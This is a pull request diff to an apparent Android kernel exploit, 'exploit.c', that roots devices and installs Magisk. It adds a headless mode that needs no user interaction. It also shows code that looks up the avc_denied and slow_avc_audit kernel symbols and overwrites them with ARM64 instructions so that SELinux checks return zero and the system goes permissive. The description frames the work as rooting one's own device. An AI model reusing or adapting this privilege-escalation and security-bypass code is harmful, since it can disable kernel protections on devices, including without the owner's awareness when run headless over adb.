### PR TITLE
Implement Patches from https://github.com/zhuowei/cheese/pull/2 and a headless option

### DIFF
--- a/exploit.c
+++ b/exploit.c
@@ -666,14 +666,12 @@ int run_magisk_installer(int headless) {
     system(cmd);
 
     printf("[*][MagiskInstall] If you got an error message saying \"Unable to start service 'sensorproxy'\" and \"See dmesg for error reason.\", Magisk installed correctly!\n");
-    printf("[*][MagiskInstall] [IMPORTANT] If you want to have zygisk functionality(for lsposed or similar modules) run 'su -c \"/data/local/tmp/live_setup.sh\"' manually, because of weird permission problems.\n");
+    printf("[!][MagiskInstall] If you want to have Zygisk functionality (for lsposed or similar modules) you must run 'su -c \"/data/local/tmp/live_setup.sh\"' in a rooted shell manually.\n");
     printf("[*][MagiskInstall] Done.\n");
     return 0;
 }
 
 int main(int argc, char** argv) {
-    // Headless mode will disable SELinux and install magisk automatically with no user interaction.
-    // It will take the best default decisions for installing magisk.
     int headless = 0;
 
     for (int i = 1; i < argc; i++) {
@@ -716,7 +714,7 @@ int main(int argc, char** argv) {
 
     if (getuid() == 0) {
         if (headless) {
-            fprintf(stderr, "[!][main] This exploit is not intended to be run as root. Aborting...\n");
+            fprintf(stderr, "[!!][main] This exploit is not intended to be run as root. Aborting...\n");
             return 1;
         }
         fprintf(stderr, "[!][main] hang on, you are running as root! this is not needed and may cause issues. are you sure you want to continue as root? [y/N]: ");
@@ -866,8 +864,6 @@ int main(int argc, char** argv) {
                 new_value ? "true" : "false",
                 new_value);
         
-        // Patches from https://github.com/zhuowei/cheese/pull/2
-        // Without these patches, magisk modules may silently fail. (unverified)
         uint64_t kernel_avc_denied_addr = exploit_kallsyms_lookup(&kallsyms_lookup, "avc_denied");
         uint32_t *kernel_avc_denied_ptr = kernel_physical_base + (kernel_avc_denied_addr - kernel_virtual_base);
         uint32_t *target_ptr = kernel_avc_denied_ptr + 14;
@@ -897,8 +893,7 @@ int main(int argc, char** argv) {
         uint64_t kernel_slow_avc_audit_addr = exploit_kallsyms_lookup(&kallsyms_lookup, "slow_avc_audit");
         char *kernel_slow_avc_audit_ptr = kernel_physical_base + (kernel_slow_avc_audit_addr - kernel_virtual_base);
 
-        // patch-out selinux checks...
-        // this might give better performance, removing selinux checks at all
+
         uint32_t ret0_code[] = {
            0xd503233f, //      paciasp
            0x2A1F03E0, //      mov     w0, wzr
@@ -913,8 +908,7 @@ int main(int argc, char** argv) {
     }
 
     if (!do_root) {
-        // Early Exit as the rest enables or requires root.
-        fprintf(stderr, "[!][main] Done.\n");
+        fprintf(stderr, "[+][main] SELinux permissive.\n");
         return 0;
     }
 


### PR DESCRIPTION
I mainly added the headless option for easier testing and debugging. This can also now be used by programs that automatically handle this exploit to install magisk through adb. Im thinking about making such a program for ease of use by end users.

The first added Patch mainly ensure that magisk zygisk modules dont silently fail as i have experienced on two devices with lsposed. The second one is mainly a performance boosting patch so that selinux doesnt log policy violations if i remember correctly.
Even with both of these patches the live_setup.sh still fails to correctly stop and restart zygote. Thats why the user is instructed to manually run 'su -c "/data/local/tmp/live_setup.sh"' after this exploit binary is done. Yes this is required and no i have no idea why. On the second run the live_setup should not log any permission errors anymore except for the sensorproxy service.